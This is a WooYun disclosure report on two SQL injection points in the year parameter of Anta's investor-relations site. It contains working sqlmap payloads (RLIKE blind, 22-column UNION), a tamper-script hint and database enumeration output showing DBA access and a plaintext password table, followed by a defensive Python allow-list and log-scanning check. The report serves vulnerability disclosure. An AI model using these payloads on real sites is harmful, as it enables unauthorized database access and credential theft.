
Vulnerability summary

Defect ID: wooyun-2015-0120823

Title: Two SQL injections on an Anta website (one of them previously reported and never fixed) (affects multiple databases)

Affected vendor: anta.com

Author: 路人甲

Submitted: 2015-06-16 16:53

Fix time: 2015-06-21 16:54

Published: 2015-06-21 16:54

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: the vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-06-16: Details sent to the vendor; awaiting vendor action
2015-06-21: Vendor chose to ignore the vulnerability; details disclosed to the public

Brief description:

See title.

Detailed description:

The SQL injection reaches a large number of databases.
User passwords in one table are, surprisingly, stored in plaintext.
Two SQL injection points:
Injection point 1:

http://ir.anta.com/sc/home.php?id=4&Itemid=3&option=3&year=*


The year parameter is injectable.
Injection point 2:

http://ir.anta.com/tc/home.php?id=4&Itemid=3&option=3&year=*


WooYun: Anta SQL injection vulnerability can affect multiple sites


The vendor confirmed this injection point more than a year ago, and it is still not fixed??? Did they forget?
When running sqlmap, note that the parameter --tamper=space2morehash.py is needed.



Proof of vulnerability:

sqlmap identified the following injection points with a total of 331 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://ir.anta.com:80/sc/home.php?id=4&Itemid=3&option=3&year=' RLIKE (SELECT (CASE WHEN (8257=8257) THEN '' ELSE 0x28 END)) AND 'gKeW'='gKeW
Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
Type: UNION query
Title: Generic UNION query (NULL) - 22 columns
Payload: http://ir.anta.com:80/sc/home.php?id=4&Itemid=3&option=3&year=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766b7171,0x447347527547427a4565,0x7162717071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
Vector: UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.4.40
back-end DBMS: MySQL >= 5.0.0
current user: 'tomocms2@%'
current database: 'tomocms2'
current user is DBA: True
available databases [54]:
Database: tomocms2
[218 tables]
Database: tomocms2
Table: user_info
[9 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| admin | varchar(1) |
| clientid | int(5) |
| email | varchar(100) |
| item | int(3) |
| lang | varchar(2) |
| login | varchar(40) |
| password | varchar(32) |
| status | varchar(1) |
| userid | int(5) |
+----------+--------------+


Passwords are stored in plaintext, and many of them are weak.


Fix recommendation:

Filter the parameter.
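As an added example (not code from the report or from the site), a Python check that implements the parameter filtering recommended above as a strict allow-list for the year value, and runs that same check over constructed access-log lines so the sqlmap-style probes shown in the proof stand out. The normalization step undoes the "#<random>" plus newline comment insertion that the space2morehash tamper mentioned earlier performs, so an obfuscated payload is judged the same as a plain one; the log lines and the IP address are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (documentation IP, not data from the report):
# a benign request, the RLIKE probe from the proof, and a UNION probe obfuscated
# the way the space2morehash tamper does (each space becomes '#<random>' + newline).
SAMPLE_LOG = """\
203.0.113.5 - - [16/Jun/2015:16:50:01 +0800] "GET /sc/home.php?id=4&Itemid=3&option=3&year=2014 HTTP/1.1" 200 5120
203.0.113.5 - - [16/Jun/2015:16:50:02 +0800] "GET /sc/home.php?id=4&Itemid=3&option=3&year='%20RLIKE%20(SELECT%20(CASE%20WHEN%20(8257=8257)%20THEN%20''%20ELSE%200x28%20END))%20AND%20'gKeW'='gKeW HTTP/1.1" 200 5120
203.0.113.5 - - [16/Jun/2015:16:50:03 +0800] "GET /sc/home.php?id=4&Itemid=3&option=3&year='%23a9f1c2%0AUNION%23d7e4%0AALL%23b3%0ASELECT%23c1%0ANULL,NULL-- HTTP/1.1" 200 5120
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST) (?P<path>\S+) HTTP/')
YEAR_RE = re.compile(r"(19|20)\d{2}")   # the only shape a year value may take
COMMENT_RE = re.compile(r"#[^\n]*\n")   # a MySQL '#' comment runs to end of line
MARKERS = ("'", "--", "/*", "rlike", "union", "select")


def year_is_valid(value: str) -> bool:
    """Allow-list filter for the year parameter: exactly four digits, nothing else.
    This is the server-side check that belongs in front of the query."""
    return YEAR_RE.fullmatch(value) is not None


def normalize(value: str) -> str:
    """Undo comment-based whitespace obfuscation. parse_qs has already URL-decoded
    the value, so each '#<hash>' + newline becomes one space and runs collapse."""
    return re.sub(r"\s+", " ", COMMENT_RE.sub(" ", value))


def suspicious_years(log_text: str) -> list:
    """Return one finding per request whose year value fails the allow-list."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group("path")).query
        for raw in parse_qs(query, keep_blank_values=True).get("year", []):
            value = normalize(raw)
            if year_is_valid(value):
                continue
            hits = [k for k in MARKERS if k in value.lower()]
            findings.append({"ip": m.group("ip"), "year": value, "markers": hits})
    return findings


if __name__ == "__main__":
    for f in suspicious_years(SAMPLE_LOG):
        print(f["ip"], repr(f["year"]), f["markers"])
```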

Copyright notice: when reposting, credit the source 路人甲@乌云


Vulnerability response

Vendor response:

Severity: No impact; vendor ignored

Ignored at: 2015-06-21 16:54

Vendor reply:

Vulnerability rank: 4 (WooYun rating)

Latest status:

None yet